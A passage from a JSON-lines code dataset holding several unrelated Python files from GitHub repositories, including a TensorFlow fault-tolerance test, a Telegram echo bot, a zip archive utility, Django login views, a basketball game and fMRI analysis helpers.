> game.screenMaxY:\n self.astroidField.pop(0)\n game.countScore()\n\n def hideAstroids(self):\n for astroid in self.astroidField:\n astroid.hide()\n\n def createAstroid(self):\n if not game.ticks % game.rowOfAstroids == 0:\n astroid = Astroid()\n self.astroidField.append(astroid)\n xPosFirstAstroid = astroid.properties[0]\n\n chance = randrange(game.chanceSecondAstroid)\n astroid = Astroid()\n if xPosFirstAstroid != astroid.properties[0] and chance == 0:\n self.astroidField.append(astroid)\n else:\n astroid = None\n del astroid\n\n\ngame = Game()\nspaceShip = Spaceship()\nastroidField = AstroidField()\n\ngame.gameStart()\n\nastroidField = None\nspaceShip = None\ngame = None\n","repo_name":"marc0janssen/Starbit-Commander-II","sub_path":"Starbit Commander II.py","file_name":"Starbit Commander II.py","file_ext":"py","file_size_in_byte":5898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"44767203940","text":"#!/bin/python3\n\nimport sys\n\ndef dayOfTheProgrammer(year):\n mon7 = 215\n feb = 0#days in february\n if(year < 1918): #julian\n feb = 28 if year%4>0 else 29\n elif(year > 1918): #gregorian\n feb = 29 if (not (year%400 >0)) or year%100>0 and (not(year%4>0)) else 28\n else: #1918\n feb = 15\n feb = 256 - (feb + mon7)\n return str(feb) + \".09.\" + str(year)\n\nyear = int(input().strip())\nresult = dayOfTheProgrammer(year)\nprint(result)\n","repo_name":"Lintik/hackerrank","sub_path":"Core CS/Algorithms/Implementation/Day of the Programmer/dayOfTheProgammer.py3","file_name":"dayOfTheProgammer.py3","file_ext":"py3","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"31"} +{"seq_id":"36894967362","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nimport json\nimport os\nimport signal\nimport sys\nimport tempfile\nimport threading\nfrom absl.testing import parameterized\nfrom tensorflow.python.distribute import collective_all_reduce_strategy as collective_strategy\nfrom tensorflow.python.distribute import combinations\nfrom tensorflow.python.distribute import distribute_coordinator as dc\nfrom tensorflow.python.distribute import mirrored_strategy\nfrom tensorflow.python.distribute import multi_worker_test_base as test_base\nfrom tensorflow.python.keras import backend as K\nfrom tensorflow.python.keras import callbacks\nfrom tensorflow.python.keras.distribute import multi_worker_testing_utils\nfrom tensorflow.python.keras.distribute import multi_worker_training_state as training_state\nfrom tensorflow.python.platform import test\n\n\ndef get_strategy_object(strategy_cls):\n if strategy_cls == mirrored_strategy.MirroredStrategy:\n return strategy_cls(mirrored_strategy.all_local_devices())\n else:\n # CollectiveAllReduceStrategy and ParameterServerStrategy.\n return strategy_cls()\n\n\nclass KerasMultiWorkerFaultToleranceTest(test_base.IndependentWorkerTestBase,\n parameterized.TestCase):\n\n class PreemptionAtBatchBoundarySimulatingCallback(callbacks.Callback):\n \"\"\"Callback to simulate preemtion at batch boundary.\"\"\"\n\n def on_epoch_begin(self, epoch, logs=None):\n self._current_epoch = epoch\n\n def on_batch_begin(self, batch, logs=None):\n if self._current_epoch == 1 and batch == 1 and not test_base.is_chief():\n # Simulate preemtion at the start of second batch of second epoch.\n raise RuntimeError('Preemption!')\n\n def on_batch_end(self, batch, logs=None):\n assert self._current_epoch < 1 or batch < 1\n\n def on_epoch_end(self, epoch, logs=None):\n assert epoch < 1\n\n # TODO(rchao): Add tests for checking 0th and 2nd epoch boundary.\n class PreemptionAtEpochBoundarySimulatingCallback(callbacks.Callback):\n \"\"\"Callback to simulate preemtion at epoch boundary.\"\"\"\n\n def on_epoch_begin(self, epoch, logs=None):\n if epoch == 1 and not test_base.is_chief():\n # Simulate preemtion at the start of second epoch.\n raise RuntimeError('Preemption!')\n\n def on_epoch_end(self, epoch, logs=None):\n assert epoch < 1\n\n @combinations.generate(\n combinations.combine(\n # Eager runtime unfortunately cannot be tested with multi-threading.\n # TODO(rchao): Add test to use multi-process for eager mode after\n # b/132095481 is resolved.\n mode=['graph'],\n strategy_cls=[collective_strategy.CollectiveAllReduceStrategy],\n required_gpus=[0, 1],\n file_format=['h5', 'tf'],\n preemption_callback=[\n PreemptionAtEpochBoundarySimulatingCallback,\n PreemptionAtBatchBoundarySimulatingCallback\n ],\n # FT should work regardless of `ModelCheckpoint`'s parameters.\n save_weights_only=[True, False],\n load_weights_on_restart=[True, False],\n ))\n def testFaultToleranceInSyncStrategy(self, strategy_cls, file_format,\n preemption_callback, save_weights_only,\n load_weights_on_restart):\n \"\"\"Test fault-tolerance with multi-threading using sync dist-strat.\n\n This test simulates multi-worker training that is interrupted by a\n preemption, by having two threads, each of which represents a chief and a\n non-chief worker, where the non-chief raises an error in the middle of\n training loop. Upon excepting the error, a new thread with a new cluster\n spec is created to simulate the recovered non-chief worker. Meanwhile, the\n chief worker cannot proceed and hangs since the non-chief worker has\n crashed. To simulate a restart of the chief, a new thread has been prepared\n to run to take over chief with the help of a condition variable. It is\n expected that after the restart of both chief and non-chief workers, the\n training continues from the epoch they previously failed at. The test\n concludes by verifying the preemption-interrupted training can finish with\n the same loss and accuracy had the preemption not occurred.\n\n TODO(rchao): Add test to check preemption on chief (possibly using multi\n processes).\n\n TODO(rchao): Add test to check fault-tolerance with multiple `model.fit()`.\n\n Arguments:\n strategy_cls: The strategy class to use.\n file_format: `h5` or `tf`.\n preemption_callback: The callback to simulate preemption.\n save_weights_only: The argument for `model.fit()`'s `save_weights_only`.\n load_weights_on_restart: The argument for `model.fit()`'s\n `load_weights_on_restart`.\n \"\"\"\n\n def _independent_worker_fn(*args, **kwargs): # pylint: disable=unused-argument\n with test.mock.patch.object(dc, '_run_std_server',\n self._make_mock_run_std_server()):\n # `before_restart` is True for the threads that represent the original\n # chief and non-chief worker, and False for threads that represent the\n # restarted chief and non-chief workers.\n before_restart = kwargs['before_restart']\n\n # Model building under strategy scope. Following is the code we expect\n # the user runs on every worker.\n strategy = get_strategy_object(strategy_cls)\n batch_size = 64\n steps = 3\n train_ds, _ = multi_worker_testing_utils.mnist_synthetic_dataset(\n batch_size, steps)\n\n with strategy.scope():\n model = multi_worker_testing_utils.get_mnist_model((28, 28, 1))\n\n # Function to start a new thread. This will be called twice in the\n # following code: one represents the restart of the non-chief, and one\n # represents the restart of the chief as a result of the restart of the\n # non-chief (so the training can continue in sync).\n def start_new_thread(new_chief):\n new_thread_tf_config = json.loads(os.environ['TF_CONFIG'])\n\n # Update the ports in new chief and new worker threads.\n new_thread_tf_config['cluster']['worker'] = kwargs['reserved_ports']\n\n # Since both new chief and new worker threads are started from the\n # worker thread, we need to overwrite the tf config task index.\n new_thread_tf_config['task']['index'] = 0 if new_chief else 1\n return self._run_task_in_thread(\n task_fn=_independent_worker_fn,\n cluster_spec=None,\n task_type=None,\n task_id=None,\n tf_config=new_thread_tf_config,\n before_restart=False,\n new_chief=new_chief)\n\n try:\n\n class CkptSavedEpochAssertingCallback(callbacks.Callback):\n\n def __init__(self, test_obj):\n super(CkptSavedEpochAssertingCallback, self).__init__()\n self.test_obj = test_obj\n\n def on_epoch_begin(self, epoch, logs=None):\n # `_ckpt_saved_epoch` attribute is set at the end of every epoch.\n self.test_obj.assertEqual(\n K.eval(self.model._ckpt_saved_epoch) ==\n training_state.CKPT_SAVED_EPOCH_UNUSED_VALUE, epoch == 0)\n\n callbacks_list = [\n callbacks.ModelCheckpoint(\n filepath=saving_filepath,\n save_weights_only=save_weights_only,\n load_weights_on_restart=load_weights_on_restart),\n CkptSavedEpochAssertingCallback(self)\n ]\n if before_restart:\n callbacks_list.append(preemption_callback())\n\n self.assertFalse(hasattr(model, training_state.CKPT_SAVED_EPOCH))\n history = model.fit(\n x=train_ds,\n epochs=num_epoch,\n steps_per_epoch=steps,\n callbacks=callbacks_list)\n self.assertFalse(hasattr(model, training_state.CKPT_SAVED_EPOCH))\n\n # `history` of the training result is collected to be compared against\n # each other. It is expected that the training results (loss and\n # accuracy`) are the same with or without preemption.\n self._histories.append(history.history)\n\n except RuntimeError:\n # pylint: disable=g-assert-in-except\n self.assertTrue(before_restart)\n # Reset the barrier so the new threads simulating recovery can\n # continue.\n self._barrier._counter = 0\n self._barrier._flag = False\n\n # At this point we block the original non-chief thread, and\n # start the new threads that simulate the restarted chief and\n # non-chief, joining the threads and return.\n new_chief_thread = start_new_thread(new_chief=True)\n new_worker_thread = start_new_thread(new_chief=False)\n self.join_independent_workers([new_chief_thread, new_worker_thread])\n return\n\n # Successful end of a `fit()` call.\n with self._lock:\n self._successful_thread_ends += 1\n self.assertFalse(before_restart)\n\n # Common parameters\n num_workers = 2\n num_epoch = 3\n # History list storing the results for preemption and no preemption cases.\n self._histories = []\n # Lock required to prevent race condition between two threads.\n self._lock = threading.Lock()\n strategy = get_strategy_object(strategy_cls)\n\n def handler(signum, frame):\n del signum, frame\n # `session.run()` within `model.fit()` can time out. Skipping it as it\n # doesn't represent the failure of this test.\n self.skipTest('Skipping test due to `session.run()` timeout.')\n\n signal.signal(signal.SIGALRM, handler)\n # Alarming within 5 min before the test timeouts and fails.\n signal.alarm(240)\n\n def get_saving_dir_and_filepath():\n saving_dir = tempfile.mkdtemp(prefix=self.get_temp_dir())\n saving_filepath = os.path.join(saving_dir, 'checkpoint.' + file_format)\n return saving_dir, saving_filepath\n\n # Case 1: Training for `num_epoch` without preemptions.\n cluster_spec = test_base.create_cluster_spec(num_workers=num_workers)\n self._barrier = dc._Barrier(2)\n self._successful_thread_ends = 0\n # Get a new temporary filepath to save the checkpoint to.\n saving_dir, saving_filepath = get_saving_dir_and_filepath()\n threads = self.run_multiple_tasks_in_threads(\n _independent_worker_fn,\n cluster_spec,\n # Pass `saving_filepath` from the parent thread to ensure every worker\n # has the same filepath to save.\n saving_filepath=saving_filepath,\n before_restart=False,\n new_chief=False)\n threads_to_join = []\n if strategy.extended.experimental_between_graph:\n for ts in threads.values():\n threads_to_join.extend(ts)\n else:\n threads_to_join = [threads['worker'][0]]\n self.join_independent_workers(threads_to_join)\n\n # `self.test_skipped_reason` could be set when a non-main thread attempts\n # to skip the test.\n # `multi_worker_test_base.skip_if_grpc_server_cant_be_started()` is an\n # example of where this can be set. Since raising `SkipTest` in a non-main\n # thread doesn't actually skip the test, we check if the test should be\n # skipped here once we have joined the threads.\n if getattr(self, 'test_skipped_reason', None) is not None:\n self.skipTest(self.test_skipped_reason)\n\n self.assertTrue(\n training_state.remove_checkpoint_if_exists(saving_dir, saving_filepath))\n self.assertEqual(self._successful_thread_ends, 2)\n\n # Case 2: Training for `num_epoch` epoch with preemptions.\n # The preemption is simulated at both epoch boundary and batch boundary.\n cluster_spec = test_base.create_cluster_spec(num_workers=num_workers)\n self._barrier = dc._Barrier(2)\n # Ports reserved for new threads simulating recovery.\n reserved_ports = [\n 'localhost:%s' % test_base.pick_unused_port()\n for _ in range(num_workers)\n ]\n self._successful_thread_ends = 0\n # Get a new temporary filepath to save the checkpoint to.\n saving_dir, saving_filepath = get_saving_dir_and_filepath()\n threads = self.run_multiple_tasks_in_threads(\n _independent_worker_fn,\n cluster_spec,\n # Pass `saving_filepath` from the parent thread to ensure every worker\n # has the same filepath to save.\n saving_filepath=saving_filepath,\n reserved_ports=reserved_ports,\n before_restart=True,\n new_chief=False)\n threads_to_join = []\n if strategy.extended.experimental_between_graph:\n # Only join the non-chief thread since the first thread for chief will\n # eventually hang and be ignored.\n threads_to_join = [threads['worker'][1]]\n else:\n threads_to_join = [threads['worker'][0]]\n self.join_independent_workers(threads_to_join)\n if getattr(self, 'test_skipped_reason', None) is not None:\n self.skipTest(self.test_skipped_reason)\n\n self.assertTrue(\n training_state.remove_checkpoint_if_exists(saving_dir, saving_filepath))\n self.assertEqual(self._successful_thread_ends, 2)\n\n def assert_all_elements_are_identical(list_to_check):\n first_item = list_to_check[0]\n for item in list_to_check[1:]:\n self.assertAllClose(first_item, item, rtol=2e-5, atol=1e-5)\n\n # Important: the results from preemption interrupted and non-interrupted\n # cases should give the same final results.\n assert_all_elements_are_identical(\n [history['acc'][-1] for history in self._histories])\n assert_all_elements_are_identical(\n [history['loss'][-1] for history in self._histories])\n # The length of `self._histories` would be num_workers * num_runs (3).\n self.assertLen(self._histories, 4)\n\n # Results from case 1 should have 3 full epochs.\n self.assertLen(self._histories[0]['acc'], 3)\n # Results from case 2 should only have 2 full epochs because it restarted at\n # epoch 1.\n self.assertLen(self._histories[-1]['acc'], 2)\n\n\nif __name__ == '__main__':\n with test.mock.patch.object(sys, 'exit', os._exit):\n test.main()\n","repo_name":"DeepRec-AI/DeepRec","sub_path":"tensorflow/python/keras/distribute/multi_worker_fault_tolerance_test.py","file_name":"multi_worker_fault_tolerance_test.py","file_ext":"py","file_size_in_byte":14251,"program_lang":"python","lang":"en","doc_type":"code","stars":895,"dataset":"github-code","pt":"31"} +{"seq_id":"29677048987","text":"S = int(input('Quantos números de sequencia? '))\nF = 0\nK = 1\nL = 3\nprint('Na sequência de Fibonacci fica:')\nprint('{} - {} -'.format(F, K), end='')\nwhile L <= S:\n G = F + K\n print(' {} '.format(G), end='')\n F = K\n K = G\n L += 1\n print('-' if L <= S else '- Limite atingido', end='')\n","repo_name":"SPSsilva/Python","sub_path":"Mundo 2/Ex. 63.py","file_name":"Ex. 63.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"7680270786","text":"from telegram.ext import CommandHandler, MessageHandler, Filters\nfrom telegram_bot_plug import Bot\n\n\nclass AnotherCustomBot(Bot):\n def __init__(self, dp):\n super().__init__(dp) # This must always be called first!\n\n self.wants_echo = False # Keeps track of if the user has typed the /start command to us\n\n handlers = [\n CommandHandler(\"echo\", self.handle_echo_command),\n MessageHandler(Filters.text & ~Filters.command, self.handle_messages),\n ]\n self.add_handlers(handlers)\n\n def handle_echo_command(self, update, context):\n # User has sent us /echo, meaning that he wants echoed his text from now on\n self.wants_echo = True\n update.message.reply_text(\"From now on I am going to be anoying\")\n\n def handle_messages(self, update, context):\n if self.wants_echo:\n update.message.reply_text(\"I like to repeat you: \" + update.message.text)\n","repo_name":"x821938/TelegramBotPlug","sub_path":"my_bots/custom_echo_bot.py","file_name":"custom_echo_bot.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"20756371541","text":"import zipfile\nimport os\n\ndef clear_console():\n if os.name == 'nt': #FOR WINDOWS\n os.system('cls')\n else: #FOR UNIX/LINUX/MACOS\n os.system('clear')\n\nclear_console()\n\ndef count_files(directory):\n \"\"\"\n COUNTS THE NUMBER OF FILES IN A DIRECTORY RECURSIVELY\n \"\"\"\n file_count = 0\n for root, dirs, files in os.walk(directory):\n file_count += len(files)\n return file_count\n\ndef create_archive(archive_name, directories):\n \"\"\"\n CREATES A ZIP ARCHIVE FROM A DIRECTORY\n \"\"\"\n with zipfile.ZipFile(archive_name, 'w', zipfile.ZIP_DEFLATED) as zipf:\n total_files = sum(count_files(directory) for directory in directories) # COUNT ALL FILES IN ALL DIRECTORIES\n processed_files = 0\n\n try:\n for directory in directories:\n for root, dirs, files in os.walk(directory):\n for file in files:\n if file == '.DS_Store':\n continue\n full_path = os.path.join(root, file)\n relative_path = os.path.relpath(full_path, directory)\n zipf.write(full_path, arcname=relative_path)\n processed_files += 1\n\n #PROGRESS BAR\n percent_complete = (processed_files / total_files) * 100\n print(\"PROGRESS: [{:<50}] {:.2f}%\".format('='*int(percent_complete/2), percent_complete), end='\\r', flush=True)\n\n #ENSURES THE PROGRESS BAR IS 25% OF THE TOTAL LENGTH AT THE END\n print(\"\\rADDING FILE {}/{} TO ARCHIVE (COMPLETED) [{}] 100.00%\".format(total_files, total_files, '='*int(50*0.25)), ' ' * 20, flush=True)\n except Exception as e:\n print(\"\\rERROR DURING ARCHIVING: {}\".format(e))\n print(\"ADDING FILE {}/{} TO ARCHIVE (INCOMPLETE) [{}] {:.2f}%\".format(processed_files, total_files, '='*int((processed_files/total_files)*50), (processed_files/total_files)*100), flush=True)\n\n print() #PRINTS A NEWLINE AT THE END\n\ndef extract_archive(archive_name, target_directory):\n \"\"\"\n EXTRACTS A ZIP ARCHIVE TO A DIRECTORY\n \"\"\"\n try:\n with zipfile.ZipFile(archive_name, 'r') as zipf:\n total_files = len(zipf.namelist())\n processed_files = 0\n\n #CREATE A DIRECTORY FOR EXTRACTION WITH THE SAME NAME AS THE ARCHIVE\n base_extraction_directory = os.path.join(target_directory, os.path.splitext(archive_name)[0])\n extraction_directory = base_extraction_directory\n i = 1\n while os.path.exists(extraction_directory):\n extraction_directory = \"{}_{}\".format(base_extraction_directory, i)\n i += 1\n os.makedirs(extraction_directory, exist_ok=True)\n\n for file in zipf.namelist():\n try:\n #ADJUSTS THE TARGET DIRECTORY FOR EXTRACTION\n zipf.extract(file, extraction_directory)\n processed_files += 1\n percent_complete = (processed_files / total_files) * 100\n print(\"PROGRESS: [{:<50}] {:.2f}%\".format('='*int(percent_complete/2), percent_complete), end='\\r', flush=True)\n except Exception as e:\n print(\"\\rERROR DURING EXTRACTION: {}\".format(e))\n print(\"EXTRACTING FILE {}/{} (INCOMPLETE) [{}] {:.2f}%\".format(processed_files, total_files, '='*int((processed_files/total_files)*50), (processed_files/total_files)*100), flush=True)\n\n print(\"\\rEXTRACTING FILE {}/{} (COMPLETED) [{}] 100.00%\".format(total_files, total_files, '='*int(50*0.25)), ' ' * 20, flush=True)\n print(\"\\nEXTRACTION COMPLETED SUCCESSFULLY!\")\n except Exception as e:\n print(f\"\\nERROR WHILE OPENING ARCHIVE: {e}\")\n\nif __name__ == \"__main__\":\n # LISTS ALL DIRECTORIES IN THE CURRENT DIRECTORY\n directories = [name for name in os.listdir('.') if os.path.isdir(name)]\n\n # IF THERE ARE NO DIRECTORIES, DISPLAYS AN ERROR MESSAGE AND EXITS\n if not directories:\n print(\"ERROR : NO DIRECTORIES FOUND.\")\n exit(1)\n\n # DISPLAYS THE DIRECTORIES AND ASKS THE USER TO CHOOSE ONE OR MORE\n while True:\n print(\"PLEASE CHOOSE ONE OR MORE DIRECTORIES TO ZIP (SEPARATED BY SPACES):\")\n for i, directory in enumerate(directories, start=1):\n print(f\"{i}. {directory}\")\n\n choices = input(\"ENTER THE NUMBERS OF THE DIRECTORIES (TAP 'EXIT' TO QUIT): \").lower().split()\n if '0' in choices or 'exit' in choices:\n print(\"OK, SCRIPT IS ENDING.\")\n exit(0)\n\n try:\n choices = [int(i)-1 for i in choices] #ADJUSTS THE INDICES\n except ValueError:\n clear_console()\n print(\"INVALID INPUT, PLEASE ENTER NUMBERS OR 'EXIT' TO QUIT.\\n\")\n continue\n\n if all(0 <= i < len(directories) for i in choices):\n chosen_directories = [directories[i] for i in choices]\n break\n else:\n clear_console()\n print(f\"THERE ARE ONLY {len(directories)} SELECTABLE DIRECTORIES, PLEASE CHOOSE AGAIN.\\n\")\n\n archive_name = '_'.join(chosen_directories) + '.zip'\n\n # IF THE ARCHAIVE ALREADY EXISTS, ASKS THE USER IF THEY WANT TO EXTRACT IT\n if os.path.exists(archive_name):\n response = input(f\"THE ARCHIVE '{archive_name}' ALREADY EXISTS. DO YOU WANT TO EXTRACT ALL ITEM HERE ? (YES/NO): \").lower()\n if response == 'y' or response == 'yes':\n extract_archive(archive_name, os.getcwd())\n else:\n print(\"OK, SCRIPT IS ENDING.\")\n exit(0)\n else:\n # MOVED OUT OF THE FOR LOOP\n create_archive(archive_name, chosen_directories)","repo_name":"BabylooPro/zipper.py","sub_path":"zipper.py","file_name":"zipper.py","file_ext":"py","file_size_in_byte":5755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22829228969","text":"from utils import print_stuff\nimport random\nimport copy\nfrom utils import clear\nfrom utils import colour_it\nfrom utils import Color\nfrom utils import choose\n\nfamous = False\n\nclass Player:\n\n\tdef __init__(self, name=\"\", offense=0, defence=0, speed=0, position=\"\", exhaustion=0):\n\t\tself.name = name\n\t\tself.offense = offense\n\t\tself.defence = defence\n\t\tself.speed = speed\n\t\tself.position = position\n\t\tself.exhaustion = exhaustion\n\n\n\tdef pass_ball(self, defender, team, ball_player, ball_distance):\n\t\tpass\n\n\n\tdef skirt(self, defender, team, ball_player, ball_distance):\n\t\tpass\n\n\tdef shoot(self, defender, team, ball_player, ball_distance):\n\t\tshot = random.randrange(1, 50 + (45 - ball_distance))\n\t\tscore = 0\n\t\tif ball_distance >= 40:\n\t\t\tprint_stuff(f\"\"\"{colour_it(self.name, Color.ALLY)} slams the ball through the hoop in a dunk!\"\"\")\n\t\t\treturn 2\n\t\telif ball_distance <= 23:\n\t\t\tprint_stuff(f\"\"\"{colour_it(self.name, Color.ALLY)} takes a shot for a 3 pointer!\"\"\")\n\t\t\tscore = 3\n\t\telif ball_distance <= 28:\n\t\t\tprint_stuff(f\"\"\"{colour_it(self.name, Color.ALLY)} takes a shot for a 2 pointer!\"\"\")\n\t\t\tscore = 2\n\t\telse:\n\t\t\tprint_stuff(f\"\"\"{colour_it(self.name, Color.ALLY)} takes a shot!\"\"\")\n\t\tif shot <= self.offense:\n\t\t\tprint_stuff(f\"\"\"Swish! Through the hoop!\"\"\")\n\t\t\treturn score\n\t\telse:\n\t\t\tprint_stuff(\"A miss! Unlucky.\")\n\t\t\treturn 0\n\n\nfirstnames = [\"John\", \"Carl\", \"David\", \"Andrew\", \"Toby\", \"Nathan\", \"Rodrigo\", \"Shaun\", \"Michael\", \"Felix\", \"Matt\", \"Ethan\"]\nlastnames = [\"Smith\", \"Cage\", \"James\", \"Hill\", \"Brown\", \"Mitchel\", \"Cole\", \"Johnson\", \"Wayne\", \"Miller\", \"Gabriel\", \"Davies\", \"McDuff\"]\nfamous_names = [\"Jesus Christ\", \"Jeff Bezos\", \"Mohammed Ali\", \"Derrin Brown\", \"Obama bin Laden\", \"Kanye West\", \"Mr Beast\", \"Snoop Dogg\", \"Neil Armstrong\", \"Spiderman\", \"Saddam Hussein\", \"Boe Jiden\", \"Bill Gates\", \"Bruce Lee\", \"Mahatma Gandhi\", \"Sugar Daddy Craig\", \"Renegade Raider\", \"Steve Jobs\", \"Mike Kachowski\"]\noffenses1 = [45, 55, 60, 70, 80]\ndefences1 = [45, 55, 60, 70, 80]\nspeeds1 = [11, 13, 16, 21, 25]\noffenses2 = copy.deepcopy(offenses1)\ndefences2 = copy.deepcopy(defences1)\nspeeds2 = copy.deepcopy(speeds1)\n\nplayer_no = 0\n\nplayers = [\"player1\", \"player2\", \"player3\", \"player4\", \"player5\"]\ngoodies = {}\nbaddies = {}\n\n\ndef generate_players():\n\tremoved_players = list(players[player_no:])\n\tfor player in removed_players:\n\t\tplayers.remove(player)\n\tfor player in players:\n\t\tif not famous:\n\t\t\tgoody_name = choose(firstnames) + \" \" + choose(lastnames)\n\t\t\tbaddy_name = choose(firstnames) + \" \" + choose(lastnames)\n\t\telse:\n\t\t\tgoody_name = choose(famous_names)\n\t\t\tbaddy_name = choose(famous_names)\n\t\tgoodies[player] = Player(goody_name, choose(offenses1), choose(defences1), choose(speeds1))\n\t\tbaddies[player] = Player(baddy_name, choose(offenses2), choose(defences2), choose(speeds2))\n\n\ndef print_players():\n\tcounter = 1\n\tclear()\n\tprint(\"Your players are:\")\n\tfor player in goodies.keys():\n\t\tprint(f\"\"\"{counter}. {colour_it(goodies[player].name, Color.ALLY)}\"\"\")\n\t\tcounter += 1\n\n\ndef view_players():\n\twhile True:\n\t\tplayer_numbers = [\"1\", \"2\", \"3\", \"4\", \"5\"]\n\t\tprint_players()\n\t\tchoice = input(\"\"\"\nEnter a player's number to view their statics, or enter any key to continue.\n>>> \"\"\")\n\t\tif choice not in player_numbers:\n\t\t\tbreak\n\t\telse:\n\t\t\tclear()\n\t\t\tprint_stuff(f\"\"\"{colour_it(goodies['player' + choice].name, Color.ALLY)}\nOffense: {goodies['player' + choice].offense}\nDefence: {goodies['player' + choice].defence}\nSpeed: {goodies['player' + choice].speed}\n\"\"\")\n","repo_name":"jessebro/basketball","sub_path":"players.py","file_name":"players.py","file_ext":"py","file_size_in_byte":3451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"10023828376","text":"from django.shortcuts import render, redirect\nfrom django.contrib import auth\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.forms import AuthenticationForm\n\nfrom forms import SignupForm\n\n\ndef signup(request):\n \"\"\"\n This function\n - returns view for signup page\n - handles http request for signup\n - creates new user\n :param request: HttpRequest\n :return: HttpResponseObject\n \"\"\"\n user = request.user\n if user.is_authenticated():\n return redirect('booking:home')\n if request.method == 'POST':\n signup_form = SignupForm(data=request.POST, prefix='signup', auto_id='id_signup_%s')\n message = ''\n if signup_form.is_valid():\n if signup_form.save():\n message = 'You account has been created, you may login with your entered credentials'\n else:\n message = 'You account has not been created, some error occurred'\n\n context = {\n 'signup_form': signup_form,\n 'message': message\n }\n return render(request, 'signup.html', context)\n else:\n signup_form = SignupForm(prefix='signup', auto_id='id_signup_%s')\n context = {\n 'signup_form': signup_form\n }\n return render(request, 'signup.html', context)\n\n\ndef login(request):\n \"\"\"\n This function\n - returns view for login page\n - handles http request for login\n - logs in user with correct credentials\n :param request: HttpRequest\n :return: HttpResponseObject\n \"\"\"\n user = request.user\n if user.is_authenticated():\n return redirect('booking:home')\n if request.method == 'POST':\n login_form = AuthenticationForm(data=request.POST, prefix='login', auto_id='id_login_%s')\n\n if login_form.is_valid():\n # Django treats unique identifiers as username, so here email is referred as username\n email = login_form.cleaned_data['username']\n password = login_form.cleaned_data['password']\n\n user = auth.authenticate(email=email, password=password)\n\n if user is not None:\n auth.login(request, user)\n return redirect('booking:home')\n\n context = {\n 'login_form': login_form\n }\n\n return render(request, 'login.html', context)\n else:\n login_form = AuthenticationForm(prefix='login', auto_id='id_login_%s')\n context = {\n 'login_form': login_form\n }\n return render(request, 'login.html', context)\n\n\n@login_required\ndef logout(request):\n \"\"\"\n This function\n - logs out a logged in user\n - redirects to login/signup page\n :param request: HttpRequest\n :return: HttpResponseObject\n \"\"\"\n auth.logout(request)\n return redirect('booking:login')\n\n\n@login_required\ndef home(request):\n \"\"\"\n This function\n - generates landing page for CRBS logged in user\n :param request: HttpRequest\n :return: HttpResponseObject\n \"\"\"\n context = {}\n return render(request, 'home.html', context)\n","repo_name":"jainendra/ConferenceRoomBookingSystem","sub_path":"booking/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3116,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"33800918600","text":"import pickle\nfrom matplotlib.pyplot import fill\nimport numpy as np\nimport pandas as pd\nfrom torch import neg\nfrom util.model_config import COCO_cat, COCO_super_cat\n\nimport configparser\n\nconfig = configparser.ConfigParser()\nconfig.read(\"config.cfg\")\nstim_path = config[\"DATA\"][\"StimuliInfo\"]\nSTIM = pd.read_pickle(stim_path)\n\n\ndef fill_in_nan_voxels(vals, subj, output_root, fill_in=0):\n try: # some subject has zeros voxels masked out\n nonzero_mask = np.load(\n \"%s/output/voxels_masks/subj%d/nonzero_voxels_subj%02d.npy\"\n % (output_root, subj, subj)\n )\n if type(vals) is list:\n tmp = np.zeros(nonzero_mask.shape) + fill_in\n tmp[nonzero_mask] = vals\n return tmp\n elif len(vals.shape) == 1:\n tmp = np.zeros(nonzero_mask.shape) + fill_in\n tmp[nonzero_mask] = vals\n return tmp\n elif len(vals.shape) == 2:\n tmp = np.zeros((vals.shape[0], len(nonzero_mask))) + fill_in\n tmp[:, nonzero_mask] = vals\n return tmp\n except FileNotFoundError:\n return vals\n\n\ndef load_model_performance(model, output_root=\".\", subj=1, measure=\"corr\"):\n if measure == \"pvalue\":\n measure = \"corr\"\n pvalue = True\n else:\n pvalue = False\n\n if type(model) == list:\n # to accomodate different naming of the same model\n for m in model:\n try:\n out = np.load(\n \"%s/output/encoding_results/subj%d/%s_%s_whole_brain.p\"\n % (output_root, subj, measure, m),\n allow_pickle=True,\n )\n except FileNotFoundError:\n continue\n else:\n out = np.load(\n \"%s/output/encoding_results/subj%d/%s_%s_whole_brain.p\"\n % (output_root, subj, measure, model),\n allow_pickle=True,\n )\n\n if measure == \"corr\":\n if pvalue:\n out = np.array(out)[:, 1]\n out = fill_in_nan_voxels(out, subj, output_root, fill_in=1)\n return out\n else:\n out = np.array(out)[:, 0]\n\n out = fill_in_nan_voxels(out, subj, output_root)\n\n return np.array(out)\n\n\ndef load_top1_objects_in_COCO(cid):\n cat = np.load(\"features/cat.npy\")\n\n # extract the nsd ID corresponding to the coco ID in the stimulus list\n stim_ind = STIM[\"nsdId\"][STIM[\"cocoId\"] == cid]\n # extract the respective features for that nsd ID\n catID_of_trial = cat[stim_ind, :]\n catnm = COCO_cat[np.argmax(catID_of_trial)]\n return catnm\n\n\ndef load_objects_in_COCO(cid):\n cat = np.load(\"features/cat.npy\")\n supcat = np.load(\"features/supcat.npy\")\n\n # extract the nsd ID corresponding to the coco ID in the stimulus list\n stim_ind = STIM[\"nsdId\"][STIM[\"cocoId\"] == cid]\n # extract the repective features for that nsd ID\n catID_of_trial = cat[stim_ind, :].squeeze()\n supcatID_of_trial = supcat[stim_ind, :].squeeze()\n catnms = []\n\n assert len(catID_of_trial) == len(COCO_cat)\n assert len(supcatID_of_trial) == len(COCO_super_cat)\n\n catnms += list(COCO_cat[catID_of_trial > 0])\n catnms += list(COCO_super_cat[supcatID_of_trial > 0])\n return catnms\n\n\ndef load_subset_trials(coco_id_by_trial, cat, negcat=False):\n \"\"\"\n Returns a list of idx to apply on the 10,000 trials for each subject. These are not trials ID themselves but\n indexs for trials IDS.\n \"\"\"\n subset_idx, negsubset_idx = [], []\n for i, id in 